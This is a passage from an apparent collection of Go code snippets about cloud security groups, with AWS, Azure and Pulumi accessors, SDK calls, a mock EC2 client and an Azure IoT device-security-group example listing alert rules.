*AwsClientWrapper) GetSecurityGroups(machine *clusterv1alpha1.Machine) ([]string, error) {\n\tinstance, err := getRunningInstance(machine, client.client)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar groups []string\n\tfor _, groupIdentifier := range instance.SecurityGroups {\n\t\tif *groupIdentifier.GroupName != \"\" {\n\t\t\tgroups = append(groups, *groupIdentifier.GroupName)\n\t\t}\n\t}\n\treturn groups, nil\n}", "func (stg *securityTestGroup) getSecurityGroups(agent string) ([]security.NetworkSecurityPolicy, error) {\n\tvar sgplist []security.NetworkSecurityPolicy\n\tstatus, err := stg.authAgentClient.Req(\"GET\", \"https://\"+agent+\":\"+globals.AgentProxyPort+\"/api/sgs/\", nil, &sgplist)\n\tif err != nil || status != http.StatusOK {\n\t\treturn nil, fmt.Errorf(\"Error getting SG Policies list: %v\", err)\n\t}\n\treturn sgplist, nil\n}", "func (c *Client) ListSecurityGroups(ctx context.Context, zone string) ([]*SecurityGroup, error) {\n\tlist := make([]*SecurityGroup, 0)\n\n\tresp, err := c.ListSecurityGroupsWithResponse(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif resp.JSON200.SecurityGroups != nil {\n\t\tfor i := range *resp.JSON200.SecurityGroups {\n\t\t\tsecurityGroup := securityGroupFromAPI(&(*resp.JSON200.SecurityGroups)[i])\n\t\t\tsecurityGroup.c = c\n\t\t\tsecurityGroup.zone = zone\n\n\t\t\tlist = append(list, securityGroup)\n\t\t}\n\t}\n\n\treturn list, nil\n}", "func dataSourceSecurityGroupAttributes(d *schema.ResourceData, data map[string]interface{}) error {\n security_group_id := data[\"id\"].(string)\n log.Printf(\"[DEBUG] Retrieved twcc_security_group: %s\", security_group_id)\n\n d.SetId(security_group_id)\n d.Set(\"name\", data[\"name\"])\n security_group_rules := flattenSecurityGroupRulesInfo(data[\"security_group_rules\"].([]interface{}))\n d.Set(\"security_group_rules\", security_group_rules)\n\n return nil\n}", "func (m *Group) SetSecurityEnabled(value *bool)() {\n m.securityEnabled = value\n}", "func (swagger *MgwSwagger) SetSecurity(security []map[string][]string) {\n\tswagger.security = security\n}", "func (o *FiltersVmGroup) GetSecurityGroupIds() []string {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupIds\n}", "func (a *AmazonConnectionsApiService) BrowseCloudSecurityGroups(ctx _context.Context, amazonConnectionId string) ApiBrowseCloudSecurityGroupsRequest {\n\treturn ApiBrowseCloudSecurityGroupsRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t\tamazonConnectionId: amazonConnectionId,\n\t}\n}", "func (o EcsLaunchTemplateOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *EcsLaunchTemplate) pulumi.StringArrayOutput { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupIds() []string {\n\tif o == nil || o.SecurityGroupIds == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupIds\n}", "func (o GetLoadBalancersBalancerOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v GetLoadBalancersBalancer) []string { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (client *ClientImpl) SetAccessControlLists(ctx context.Context, args SetAccessControlListsArgs) error {\n\tif args.AccessControlLists == nil {\n\t\treturn &azuredevops.ArgumentNilError{ArgumentName: \"args.AccessControlLists\"}\n\t}\n\trouteValues := make(map[string]string)\n\tif args.SecurityNamespaceId == nil {\n\t\treturn &azuredevops.ArgumentNilError{ArgumentName: \"args.SecurityNamespaceId\"}\n\t}\n\trouteValues[\"securityNamespaceId\"] = (*args.SecurityNamespaceId).String()\n\n\tbody, marshalErr := json.Marshal(*args.AccessControlLists)\n\tif marshalErr != nil {\n\t\treturn marshalErr\n\t}\n\tlocationId, _ := uuid.Parse(\"18a2ad18-7571-46ae-bec7-0c7da1495885\")\n\t_, err := client.Client.Send(ctx, http.MethodPost, locationId, \"7.1-preview.1\", routeValues, nil, bytes.NewReader(body), \"application/json\", \"application/json\", nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (instance *Host) ListSecurityGroups(ctx context.Context, state securitygroupstate.Enum) (list []*propertiesv1.SecurityGroupBond, ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\n\t// instance.RLock()\n\t// defer instance.RUnlock()\n\n\txerr := instance.Inspect(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Inspect(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tlist = FilterBondsByKind(hsgV1.ByID, state)\n\t\t\treturn nil\n\t\t})\n\t})\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\treturn list, nil\n}", "func (db *DB) SetSecurity(ctx context.Context, security *Security) error {\n\tsec := &driver.Security{\n\t\tAdmins: driver.Members(security.Admins),\n\t\tMembers: driver.Members(security.Members),\n\t}\n\treturn db.driverDB.SetSecurity(ctx, sec)\n}", "func (m *MockClient) DescribeSecurityGroups(arg0 *ec2.DescribeSecurityGroupsInput) (*ec2.DescribeSecurityGroupsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DescribeSecurityGroups\", arg0)\n\tret0, _ := ret[0].(*ec2.DescribeSecurityGroupsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (db *Database) SetSecurity(o SecurityObject) error {\n\theaders := map[string]string{\"Content-Type\": \"application/json\"}\n\tpayload, err := json.Marshal(o)\n\tif err != nil {\n\t\treturn err\n\t}\n\tresp, err := db.conn.request(\"PUT\", queryURL(db.Name, \"_security\"), headers, bytes.NewReader(payload), db.auth, 0)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar result map[string]bool\n\tif err := parseBody(resp, &result); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (o *SecurityGroup) SetSecurityGroupName(v string) {\n\to.SecurityGroupName = &v\n}", "func (o *VirtualMachineToAlternativeRestoreOptions) SetNetworkSecurityGroupId(v string) {\n\to.NetworkSecurityGroupId = v\n}", "func (m *ExternalConnection) SetGroups(value []ExternalGroupable)() {\n m.groups = value\n}", "func (r *LaunchConfiguration) VpcClassicLinkSecurityGroups() pulumi.ArrayOutput {\n\treturn (pulumi.ArrayOutput)(r.s.State[\"vpcClassicLinkSecurityGroups\"])\n}", "func ExampleDeviceSecurityGroupsClient_CreateOrUpdate() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armsecurity.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewDeviceSecurityGroupsClient().CreateOrUpdate(ctx, \"subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub\", \"samplesecuritygroup\", armsecurity.DeviceSecurityGroup{\n\t\tProperties: &armsecurity.DeviceSecurityGroupProperties{\n\t\t\tTimeWindowRules: []armsecurity.TimeWindowCustomAlertRuleClassification{\n\t\t\t\t&armsecurity.ActiveConnectionsNotInAllowedRange{\n\t\t\t\t\tIsEnabled: to.Ptr(true),\n\t\t\t\t\tRuleType: to.Ptr(\"ActiveConnectionsNotInAllowedRange\"),\n\t\t\t\t\tMaxThreshold: to.Ptr[int32](30),\n\t\t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t\t\t\t\tTimeWindowSize: to.Ptr(\"PT05M\"),\n\t\t\t\t}},\n\t\t},\n\t}, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.DeviceSecurityGroup = armsecurity.DeviceSecurityGroup{\n\t// \tName: to.Ptr(\"samplesecuritygroup\"),\n\t// \tType: to.Ptr(\"Microsoft.Security/deviceSecurityGroups\"),\n\t// \tID: to.Ptr(\"/subscriptions/20ff7fc3-e762-44dd-bd96-b71116dcdc23/resourceGroups/SampleRG/providers/Microsoft.Devices/iotHubs/sampleiothub/providers/Microsoft.Security/deviceSecurityGroups/samplesecuritygroup\"),\n\t// \tProperties: &armsecurity.DeviceSecurityGroupProperties{\n\t// \t\tAllowlistRules: []armsecurity.AllowlistCustomAlertRuleClassification{\n\t// \t\t\t&armsecurity.ConnectionToIPNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when an outbound connection is created between your device and an ip that isn't allowed\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Outbound connection to an ip that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ConnectionToIpNotAllowed\"),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.LocalUserNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when a local user that isn't allowed logins to the device\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Login by a local user that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"LocalUserNotAllowed\"),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.ProcessNotAllowed{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when a process that isn't allowed is executed\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Execution of a process that isn't allowed\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"ProcessNotAllowed\"),\n\t// \t\t\t\tAllowlistValues: []*string{\n\t// \t\t\t\t},\n\t// \t\t}},\n\t// \t\tDenylistRules: []*armsecurity.DenylistCustomAlertRule{\n\t// \t\t},\n\t// \t\tThresholdRules: []armsecurity.ThresholdCustomAlertRuleClassification{\n\t// \t\t},\n\t// \t\tTimeWindowRules: []armsecurity.TimeWindowCustomAlertRuleClassification{\n\t// \t\t\t&armsecurity.ActiveConnectionsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of active connections of a device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of active connections is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(true),\n\t// \t\t\t\tRuleType: to.Ptr(\"ActiveConnectionsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](30),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT05M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (AMQP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (MQTT protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPC2DMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (HTTP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of cloud to device messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpC2DMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (AMQP protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (MQTT protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPC2DRejectedMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of cloud to device messages (HTTP protocol) that were rejected by the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of rejected cloud to device messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpC2DRejectedMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (AMQP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (MQTT protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (HTTP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.DirectMethodInvokesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of direct method invokes in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of direct method invokes is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"DirectMethodInvokesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.FailedLocalLoginsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of failed local logins on the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of failed local logins is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"FailedLocalLoginsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.FileUploadsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of file uploads from the device to the cloud in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of file uploads is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"FileUploadsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.QueuePurgesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device queue purges in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device queue purges is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"QueuePurgesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.TwinUpdatesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of twin updates (by the device or the service) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of twin updates is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"TwinUpdatesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.UnauthorizedOperationsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number unauthorized operations in the time window is not in the allowed range. Unauthorized operations are operations that affect the device (or done by it) that fail because of an unauthorized error\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of unauthorized operations is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"UnauthorizedOperationsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t}},\n\t// \t},\n\t// }\n}", "func (s *ServerLaunchConfiguration) SetSecurityGroup(v string) *ServerLaunchConfiguration {\n\ts.SecurityGroup = &v\n\treturn s\n}", "func (s *Service) CreateOrUpdateNetworkSecurityGroup(resourceGroupName string, networkSecurityGroupName string, location string) (*armada.SecurityGroupsCreateOrUpdateFuture, error) {\n\t//JEB if networkSecurityGroupName == \"\" {\n\t//JEB networkSecurityGroupName = SecurityGroupDefaultName\n\t//JEB }\n\t//JEB sshInbound := armada.SecurityRule{\n\t//JEB Name: to.StringPtr(\"ClusterAPISSH\"),\n\t//JEB SecurityRulePropertiesFormat: &armada.SecurityRulePropertiesFormat{\n\t//JEB Protocol: armada.SecurityRuleProtocolTCP,\n\t//JEB SourcePortRange: to.StringPtr(\"*\"),\n\t//JEB DestinationPortRange: to.StringPtr(\"22\"),\n\t//JEB SourceAddressPrefix: to.StringPtr(\"*\"),\n\t//JEB DestinationAddressPrefix: to.StringPtr(\"*\"),\n\t//JEB Priority: to.Int32Ptr(1000),\n\t//JEB Direction: armada.SecurityRuleDirectionInbound,\n\t//JEB Access: armada.SecurityRuleAccessAllow,\n\t//JEB },\n\t//JEB }\n\t//JEB\n\t//JEB kubernetesInbound := armada.SecurityRule{\n\t//JEB Name: to.StringPtr(\"KubernetesAPI\"),\n\t//JEB SecurityRulePropertiesFormat: &armada.SecurityRulePropertiesFormat{\n\t//JEB Protocol: armada.SecurityRuleProtocolTCP,\n\t//JEB SourcePortRange: to.StringPtr(\"*\"),\n\t//JEB DestinationPortRange: to.StringPtr(\"6443\"),\n\t//JEB SourceAddressPrefix: to.StringPtr(\"*\"),\n\t//JEB DestinationAddressPrefix: to.StringPtr(\"*\"),\n\t//JEB Priority: to.Int32Ptr(1001),\n\t//JEB Direction: armada.SecurityRuleDirectionInbound,\n\t//JEB Access: armada.SecurityRuleAccessAllow,\n\t//JEB },\n\t//JEB }\n\t//JEB\n\t//JEB securityGroupProperties := armada.SecurityGroupPropertiesFormat{\n\t//JEB SecurityRules: &[]armada.SecurityRule{sshInbound, kubernetesInbound},\n\t//JEB }\n\t//JEB securityGroup := armada.SecurityGroup{\n\t//JEB Location: to.StringPtr(location),\n\t//JEB SecurityGroupPropertiesFormat: &securityGroupProperties,\n\t//JEB }\n\t//JEB sgFuture, err := s.scope.AirshipClients.SecurityGroups.CreateOrUpdate(s.scope.Context, resourceGroupName, networkSecurityGroupName, securityGroup)\n\t//JEB if err != nil {\n\t//JEB return nil, err\n\t//JEB }\n\t//JEB return &sgFuture, nil\n\treturn &armada.SecurityGroupsCreateOrUpdateFuture{}, nil\n}", "func (m *Group) SetSecurityIdentifier(value *string)() {\n m.securityIdentifier = value\n}", "func (s UserSet) SetGroups(value m.GroupSet) {\n\ts.RecordCollection.Set(models.NewFieldName(\"Groups\", \"group_ids\"), value)\n}", "func (o *FiltersSecurityGroup) SetSecurityGroupNames(v []string) {\n\to.SecurityGroupNames = &v\n}", "func (instance *Host) EnableSecurityGroup(ctx context.Context, sg resources.SecurityGroup) (ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn fail.InvalidInstanceError()\n\t}\n\tif ctx == nil {\n\t\treturn fail.InvalidParameterError(\"ctx\", \"cannot be nil\")\n\t}\n\tif sg == nil {\n\t\treturn fail.InvalidParameterError(\"sg\", \"cannot be null value of 'SecurityGroup'\")\n\t}\n\n\thid, err := instance.GetID()\n\tif err != nil {\n\t\treturn fail.ConvertError(err)\n\t}\n\n\tsgName := sg.GetName()\n\n\t// instance.Lock()\n\t// defer instance.Unlock()\n\n\tsvc := instance.Service()\n\txerr := instance.Alter(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Inspect(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tvar asg *abstract.SecurityGroup\n\t\t\txerr := sg.Inspect(ctx, func(clonable data.Clonable, _ *serialize.JSONProperties) fail.Error {\n\t\t\t\tvar ok bool\n\t\t\t\tif asg, ok = clonable.(*abstract.SecurityGroup); !ok {\n\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.SecurityGroup' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t}\n\n\t\t\t\treturn nil\n\t\t\t})\n\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\tif xerr != nil {\n\t\t\t\treturn xerr\n\t\t\t}\n\n\t\t\t// First check if the security group is not already registered for the Host with the exact same state\n\t\t\tvar found bool\n\t\t\tfor k := range hsgV1.ByID {\n\t\t\t\tif k == asg.ID {\n\t\t\t\t\tfound = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !found {\n\t\t\t\treturn fail.NotFoundError(\"security group '%s' is not bound to Host '%s'\", sgName, hid)\n\t\t\t}\n\n\t\t\t{\n\t\t\t\t// Bind the security group on provider side; if already bound (*fail.ErrDuplicate), considered as a success\n\t\t\t\txerr = svc.BindSecurityGroupToHost(ctx, asg, hid)\n\t\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\t\tif xerr != nil {\n\t\t\t\t\tswitch xerr.(type) {\n\t\t\t\t\tcase *fail.ErrDuplicate:\n\t\t\t\t\t\tdebug.IgnoreError2(ctx, xerr)\n\t\t\t\t\tdefault:\n\t\t\t\t\t\treturn xerr\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// found and updated, update metadata\n\t\t\thsgV1.ByID[asg.ID].Disabled = false\n\t\t\treturn nil\n\t\t})\n\t})\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\treturn nil\n}", "func (in *AWSGroup) DeepEqual(other *AWSGroup) bool {\n\tif other == nil {\n\t\treturn false\n\t}\n\n\tif ((in.Labels != nil) && (other.Labels != nil)) || ((in.Labels == nil) != (other.Labels == nil)) {\n\t\tin, other := &in.Labels, &other.Labels\n\t\tif other == nil {\n\t\t\treturn false\n\t\t}\n\n\t\tif len(*in) != len(*other) {\n\t\t\treturn false\n\t\t} else {\n\t\t\tfor key, inValue := range *in {\n\t\t\t\tif otherValue, present := (*other)[key]; !present {\n\t\t\t\t\treturn false\n\t\t\t\t} else {\n\t\t\t\t\tif inValue != otherValue {\n\t\t\t\t\t\treturn false\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif ((in.SecurityGroupsIds != nil) && (other.SecurityGroupsIds != nil)) || ((in.SecurityGroupsIds == nil) != (other.SecurityGroupsIds == nil)) {\n\t\tin, other := &in.SecurityGroupsIds, &other.SecurityGroupsIds\n\t\tif other == nil {\n\t\t\treturn false\n\t\t}\n\n\t\tif len(*in) != len(*other) {\n\t\t\treturn false\n\t\t} else {\n\t\t\tfor i, inElement := range *in {\n\t\t\t\tif inElement != (*other)[i] {\n\t\t\t\t\treturn false\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif ((in.SecurityGroupsNames != nil) && (other.SecurityGroupsNames != nil)) || ((in.SecurityGroupsNames == nil) != (other.SecurityGroupsNames == nil)) {\n\t\tin, other := &in.SecurityGroupsNames, &other.SecurityGroupsNames\n\t\tif other == nil {\n\t\t\treturn false\n\t\t}\n\n\t\tif len(*in) != len(*other) {\n\t\t\treturn false\n\t\t} else {\n\t\t\tfor i, inElement := range *in 